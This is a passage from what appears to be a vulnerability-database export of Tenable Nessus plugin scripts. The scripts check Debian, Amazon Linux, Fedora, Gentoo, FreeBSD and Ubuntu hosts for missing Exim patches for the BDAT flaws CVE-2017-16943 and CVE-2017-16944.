disable advertising\nthe ESMTP CHUNKING extension and are not affected by these issues.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:exim4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:9.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/11/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/12/01\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"9.0\", prefix:\"exim4\", reference:\"4.89-2+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"exim4-base\", reference:\"4.89-2+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"exim4-config\", reference:\"4.89-2+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"exim4-daemon-heavy\", reference:\"4.89-2+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"exim4-daemon-heavy-dbg\", reference:\"4.89-2+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"exim4-daemon-light\", reference:\"4.89-2+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"exim4-daemon-light-dbg\", reference:\"4.89-2+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"exim4-dbg\", reference:\"4.89-2+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"exim4-dev\", reference:\"4.89-2+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"eximon4\", reference:\"4.89-2+deb9u2\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-12-13T06:39:14", "bulletinFamily": "scanner", "description": "Use-after-free in receive_msg function via vectors involving BDAT\ncommands\n\nThe receive_msg function in receive.c in the SMTP daemon in Exim 4.88\nand 4.89 allows remote attackers to execute arbitrary code or cause a\ndenial of service (use-after-free) via vectors involving BDAT\ncommands. (CVE-2017-16943)\n\nInfinite loop and stack exhaustion in receive_msg function via vectors\ninvolving BDAT commands\n\nThe receive_msg function in receive.c in the SMTP daemon in Exim 4.88\nand 4.89 allows remote attackers to cause a denial of service\n(infinite loop and stack exhaustion) via vectors involving BDAT\ncommands and an improper check for a ", "modified": "2019-12-02T00:00:00", "id": "ALA_ALAS-2017-932.NASL", "href": "https://www.tenable.com/plugins/nessus/105417", "published": "2017-12-26T00:00:00", "title": "Amazon Linux AMI : exim (ALAS-2017-932)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux AMI Security Advisory ALAS-2017-932.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(105417);\n script_version(\"3.4\");\n script_cvs_date(\"Date: 2019/04/10 16:10:16\");\n\n script_cve_id(\"CVE-2017-16943\", \"CVE-2017-16944\");\n script_xref(name:\"ALAS\", value:\"2017-932\");\n\n script_name(english:\"Amazon Linux AMI : exim (ALAS-2017-932)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Amazon Linux AMI host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Use-after-free in receive_msg function via vectors involving BDAT\ncommands\n\nThe receive_msg function in receive.c in the SMTP daemon in Exim 4.88\nand 4.89 allows remote attackers to execute arbitrary code or cause a\ndenial of service (use-after-free) via vectors involving BDAT\ncommands. (CVE-2017-16943)\n\nInfinite loop and stack exhaustion in receive_msg function via vectors\ninvolving BDAT commands\n\nThe receive_msg function in receive.c in the SMTP daemon in Exim 4.88\nand 4.89 allows remote attackers to cause a denial of service\n(infinite loop and stack exhaustion) via vectors involving BDAT\ncommands and an improper check for a '.' character signifying the end\nof the content, related to the bdat_getc function. (CVE-2017-16944)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://alas.aws.amazon.com/ALAS-2017-932.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Run 'yum update exim' to update your system.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:exim\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:exim-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:exim-greylist\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:exim-mon\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:exim-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:exim-pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/12/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/12/26\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nos_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"A\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux AMI\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (rpm_check(release:\"ALA\", reference:\"exim-4.89-4.17.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"exim-debuginfo-4.89-4.17.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"exim-greylist-4.89-4.17.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"exim-mon-4.89-4.17.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"exim-mysql-4.89-4.17.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"exim-pgsql-4.89-4.17.amzn1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"exim / exim-debuginfo / exim-greylist / exim-mon / exim-mysql / etc\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-12-13T07:04:30", "bulletinFamily": "scanner", "description": "This is an update fixing denial of service (CVE-2017-16944).\n\n----\n\nThis is an update fixing use-after-free (CVE-2017-16943).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.", "modified": "2019-12-02T00:00:00", "id": "FEDORA_2017-0032BAA7D7.NASL", "href": "https://www.tenable.com/plugins/nessus/105196", "published": "2017-12-13T00:00:00", "title": "Fedora 26 : exim (2017-0032baa7d7)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2017-0032baa7d7.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(105196);\n script_version(\"3.4\");\n script_cvs_date(\"Date: 2019/09/24 14:09:05\");\n\n script_cve_id(\"CVE-2017-16943\", \"CVE-2017-16944\");\n script_xref(name:\"FEDORA\", value:\"2017-0032baa7d7\");\n\n script_name(english:\"Fedora 26 : exim (2017-0032baa7d7)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This is an update fixing denial of service (CVE-2017-16944).\n\n----\n\nThis is an update fixing use-after-free (CVE-2017-16943).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2017-0032baa7d7\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected exim package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:exim\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:26\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/11/25\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/12/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/12/13\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^26([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 26\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC26\", reference:\"exim-4.89-7.fc26\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"exim\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-12-13T07:35:43", "bulletinFamily": "scanner", "description": "The remote host is affected by the vulnerability described in GLSA-201803-01\n(Exim: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in Exim. Please review the\n CVE identifiers referenced below for details.\n \nImpact :\n\n A remote attacker, by connecting to the SMTP listener daemon, could\n possibly execute arbitrary code with the privileges of the process or\n cause a Denial of Service condition.\n \nWorkaround :\n\n There is no known workaround at this time.", "modified": "2019-12-02T00:00:00", "id": "GENTOO_GLSA-201803-01.NASL", "href": "https://www.tenable.com/plugins/nessus/107178", "published": "2018-03-07T00:00:00", "title": "GLSA-201803-01 : Exim: Multiple vulnerabilities", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 201803-01.\n#\n# The advisory text is Copyright (C) 2001-2019 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(107178);\n script_version(\"1.5\");\n script_cvs_date(\"Date: 2019/04/30 14:30:16\");\n\n script_cve_id(\"CVE-2017-16943\", \"CVE-2017-16944\", \"CVE-2018-6789\");\n script_xref(name:\"GLSA\", value:\"201803-01\");\n\n script_name(english:\"GLSA-201803-01 : Exim: Multiple vulnerabilities\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-201803-01\n(Exim: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in Exim. Please review the\n CVE identifiers referenced below for details.\n \nImpact :\n\n A remote attacker, by connecting to the SMTP listener daemon, could\n possibly execute arbitrary code with the privileges of the process or\n cause a Denial of Service condition.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/201803-01\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All Exim users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=mail-mta/exim-4.90.1'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:exim\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/11/25\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/03/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/03/07\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"mail-mta/exim\", unaffected:make_list(\"ge 4.90.1\"), vulnerable:make_list(\"lt 4.90.1\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"Exim\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-12-13T07:30:21", "bulletinFamily": "scanner", "description": "Exim developers team reports :\n\nThe receive_msg function in receive.c in the SMTP daemon in Exim 4.88\nand 4.89 allows remote attackers to cause a denial of service\n(infinite loop and stack exhaustion) via vectors involving BDAT\ncommands and an improper check for a ", "modified": "2019-12-02T00:00:00", "id": "FREEBSD_PKG_75DD622CD5FD11E7B9FEC13EB7BCBF4F.NASL", "href": "https://www.tenable.com/plugins/nessus/104944", "published": "2017-12-01T00:00:00", "title": "FreeBSD : exim -- remote DoS attack in BDAT processing (75dd622c-d5fd-11e7-b9fe-c13eb7bcbf4f)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(104944);\n script_version(\"3.5\");\n script_cvs_date(\"Date: 2019/04/10 16:10:17\");\n\n script_cve_id(\"CVE-2017-16944\");\n\n script_name(english:\"FreeBSD : exim -- remote DoS attack in BDAT processing (75dd622c-d5fd-11e7-b9fe-c13eb7bcbf4f)\");\n script_summary(english:\"Checks for updated package in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote FreeBSD host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Exim developers team reports :\n\nThe receive_msg function in receive.c in the SMTP daemon in Exim 4.88\nand 4.89 allows remote attackers to cause a denial of service\n(infinite loop and stack exhaustion) via vectors involving BDAT\ncommands and an improper check for a '.' character signifying the end\nof the content, related to the bdat_getc function.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.exim.org/show_bug.cgi?id=2199\"\n );\n # https://vuxml.freebsd.org/freebsd/75dd622c-d5fd-11e7-b9fe-c13eb7bcbf4f.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?0d397a7c\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:exim\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/11/23\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/11/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/12/01\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"exim>=4.88<4.89.1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:pkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-12-13T09:47:08", "bulletinFamily": "scanner", "description": "It was discovered that Exim incorrectly handled certain BDAT data\nheaders. A remote attacker could possibly use this issue to cause Exim\nto crash, resulting in a denial of service.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "modified": "2019-12-02T00:00:00", "id": "UBUNTU_USN-3499-1.NASL", "href": "https://www.tenable.com/plugins/nessus/104882", "published": "2017-11-30T00:00:00", "title": "Ubuntu 17.04 / 17.10 : exim4 vulnerability (USN-3499-1)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-3499-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(104882);\n script_version(\"3.8\");\n script_cvs_date(\"Date: 2019/09/18 12:31:47\");\n\n script_cve_id(\"CVE-2017-16944\");\n script_xref(name:\"USN\", value:\"3499-1\");\n\n script_name(english:\"Ubuntu 17.04 / 17.10 : exim4 vulnerability (USN-3499-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"It was discovered that Exim incorrectly handled certain BDAT data\nheaders. A remote attacker could possibly use this issue to cause Exim\nto crash, resulting in a denial of service.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/3499-1/\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Update the affected exim4-daemon-heavy and / or exim4-daemon-light\npackages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:exim4-daemon-heavy\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:exim4-daemon-light\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:17.04\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:17.10\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/11/25\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/11/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/11/30\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2017-2019 Canonical, Inc. / NASL script (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(17\\.04|17\\.10)$\", string:release)) 